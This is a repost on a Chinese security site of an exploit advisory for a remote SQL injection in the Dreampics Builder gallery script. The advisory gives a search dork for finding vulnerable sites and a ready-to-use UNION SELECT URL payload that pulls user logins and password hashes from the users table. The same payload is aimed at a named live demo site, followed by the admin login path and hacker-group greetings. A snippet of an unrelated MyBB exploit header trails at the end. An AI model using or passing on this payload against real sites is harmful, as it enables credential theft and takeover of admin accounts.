建站极客  
                        网络安全                          Exploit                          正文 
                     
                 
                
                    Dreampics Builder (page) Remote SQL Injection Vulnerability                 
                
                    所属分类:
                        网络安全  / Exploit                      
                    阅读数:
                        112 
                    
                        
                                 
                             收藏 0
                                 
                             赞 0
                                 
                             分享 
                    
                 
                
                    ######################################################### 
# 
#     PICS BUILDER (page) SQL Injection Vulnerability 
#======================================================== 
#    Author: Hussin X                                   = 
#                                                       = 
#    Home :  www.tryag.cc/cc                            = 
#                                                       = 
#    email:  darkangel_g85[at]Yahoo[DoT]com             = 
#                                                       = 
#=========================================================     
# 
#    script :  http://www.dreamlevels.com/dreampics.php 
# 
#    DorK   :   powered by Dreampics Builder 
#      
########################################################## 
 
Exploit:  
 
www.[target].com/Script/?page=-2 union select null,null,null,null,concat_ws(0x3a,user_login,user_password),null,null,null from users-- 
 
 
L!VE DEMO: 
 
http://www.dreamlevels.com/demo/photosite/?page=-2 union select null,null,null,null,concat_ws(0x3a,user_login,user_password),null,null,null from users-- 
 
 
Admin Login : 
 
/admin/ 
 
########################( Greetz )########################### 
#                                                           # 
# tryag.cc / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUR /str0ke    # 
#                                                           #     
#         Iraqihack / FAHD / mos_chori / Silic0n            # 
#                                                           # 
############################################################# 
 
                       Im IRAQi
                                     
             
            
                
                MyBulletinBoard (MyBB) <?php
// forum mybb <= 1.2.11 remote sql injection vulnerability
// bug found by Janek Vind "waraxe" http://www.waraxe
                    评论 0 
                    
                         
                     收藏 0
                         
                     赞 0
                         
                     分享
                 查看更多